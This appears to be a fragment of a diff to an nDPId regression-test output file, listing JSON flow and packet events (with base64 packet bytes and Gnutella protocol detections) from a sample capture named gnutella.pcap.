+00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":63002,"flow_last_seen":63002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":63002,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":63002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":63002,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IqxAAIAGH9YKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":63029,"flow_last_seen":63029,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":63029,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57622,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":63029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":63029,"pkt":"UlQAEjUCCAAn5uVZCABFAAAegUIAAIARoXwKAAIPCgACAuEWFOcACvHLAAA="} 
-00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":63233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63233,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAoYAAEAGCJAvkzQVCgACD494xBcAY5wBOEHDT2AS\/\/882gAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":63234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63234,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouwVAAIAG0BMKAAIPL5M0FcQXj3g4QcNPAGOcAlAQ+vBZpgAA"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":63250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63250,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAocAAEAGiwHa+gY7CgACDzEMxBQAZJYBrKXgdGAS\/\/+SMQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":63250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63250,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLR5AAIAG4G0KAAIP2voGO8QUMQyspeB0AGSWAlAQ+vCu\/QAA"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":63297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63297,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAooAAEAG5kR2qA9HCgACDw9bxBUAZZABIZ4f2mAS\/\/9gyQAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":63297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63297,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTFBAAIAGHIIKAAIPdqgPR8QVD1shnh\/aAGWQAlAQ+vB9lQAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64030,"flow_last_seen":64030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64030,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":64030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64030,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZhAAIAG6a4KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64031,"flow_last_seen":64031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64031,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":64031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cDRAAIAGoD8KAAIPPd6gY8QbSjIrqiNHAAAAAIAC+vAskAAAAgQFtAEDAwgBAQQC"} 
-00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FX9AAIAGQkwKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTBAAIAGk6sKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0yBFAAIAG2fkKAAIPr7Wc9MQeID9tpdrVAAAAAIAC+vDujQAAAgQFtAEDAwgBAQQC"} 
-00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64033,"flow_last_seen":64033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64033,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":64033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64033,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpNAAIAGVgcKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":64213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64213,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoApQAAP8Gwb497q2ACgACD+EwxBoAAAAAK91tIlAUAAB6CAAA"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":64275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64275,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApUAAEAGjec93qBjCgACD0oyxBsAZ4QBK6ojSGAS\/\/\/MHQAAAgQFtA=="} 
-00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":64276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64276,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocDVAAIAGoEoKAAIPPd6gY8QbSjIrqiNIAGeEAlAQ+vDo6QAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":64291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64291,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApcAAEAGH32vtZz0CgACDyA\/xB4AaH4BbaXa1mAS\/\/+UGgAAAgQFtA=="} 
-00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":64291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64291,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoyBJAAIAG2gQKAAIPr7Wc9MQeID9tpdrWAGh+AlAQ+vCw5gAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":64717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZlAAIAG6a0KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} 
-00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8tAAIAGVuYKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YBAAIAG1DkKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW5AAIAGEbcKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} 
-00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SFBAAIAGjWIKAAIPDscKPMQjW6L9nzYkAAAAAIAC+vD7gwAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVpAAIAG3iEKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65063,"flow_last_seen":65063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65063,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":65063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65063,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWpAAIAG8s4KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":63233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63233,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAoYAAEAGCJAvkzQVCgACD494xBcAY5wBOEHDT2AS\/\/882gAAAgQFtA=="} 
+00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":63234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63234,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouwVAAIAG0BMKAAIPL5M0FcQXj3g4QcNPAGOcAlAQ+vBZpgAA"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":63250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63250,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAocAAEAGiwHa+gY7CgACDzEMxBQAZJYBrKXgdGAS\/\/+SMQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":63250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63250,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLR5AAIAG4G0KAAIP2voGO8QUMQyspeB0AGSWAlAQ+vCu\/QAA"} 